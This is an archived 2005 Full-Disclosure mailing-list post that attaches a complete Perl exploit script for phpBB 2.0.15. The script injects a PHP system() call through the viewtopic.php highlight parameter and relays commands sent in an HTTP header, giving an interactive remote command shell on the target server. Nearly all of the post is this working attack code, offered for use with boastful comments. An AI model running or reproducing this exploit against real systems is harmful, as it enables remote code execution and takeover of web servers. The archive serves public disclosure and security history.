lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Date: Thu Jun 30 00:44:29 2005 From: dab at digitalsec.net (dab) Subject: phpBB 2.0.15 exploit (w0op!) See attached file. -- dab @ !dSR http://www.digitalsec.net - -------------- next part -------------- #!/usr/bin/perl # Wed Jun 29 19:08:04 CEST 2005 dab@...italsec.net # # phpBB 2.0.15 -re-bug in viewtopic.php # The complete Open Source Development with CVS: GNU General Public License # Book on using CVS effectively <--------- cvs, is also GPL # or http://www.google.es/search?q=programming+howto # # BLINK! BLINK! BLINK! *** BRUTEFORCE CAPABILITIES *** BLINK! BLINK! BLINK! # # # Example: ./phpbb2_0_15.pl http://www.server.com/viewtopic.php?t=1 # You can start typing commands. # Tested in BSD. Theo.. it works! # # !dSR: que todos los hackers digan YO!! # # use strict; use IO::Socket; unless ($ARGV[0]) { print "$0 <viewtopic url>\n"; exit(1); } $ARGV[0] =~ m!http://(.*?)/(.*?t=\d+)!; my ($server, $port) = split (/:/,$1); $port = 80 unless defined($port); $server = $1 unless defined($server); my ($url, $command) = $2; print "$server - $port - $url\n"; while () { print "phpBB2.0.15> "; while(<STDIN>) { $command=$_; chomp($command); last; } &send($command); } sub send { my $ok = 0; my $cmd = "echo \"#PHPBBEXPLOIT#\";".$_[0].";echo \"#PHPBBEXPLOIT#\""; my $string = "GET /$url&highlight='.system(getenv(HTTP_PHP)).' HTTP/1.1\n". "Host: $server\nPHP: $cmd\n\n\n\n"; my $socket = IO::Socket::INET->new(PeerAddr => $server, PeerPort => $port, Proto => "tcp", Type => SOCK_STREAM) or die "can't connect to: $server : $@\n"; print $socket $string; while(<$socket>) { if (/#PHPBBEXPLOIT#/) { close($socket) and last if $ok eq 2; $ok++; next; } print if $ok eq "1"; } } exit 0;
Powered by blists - more mailing lists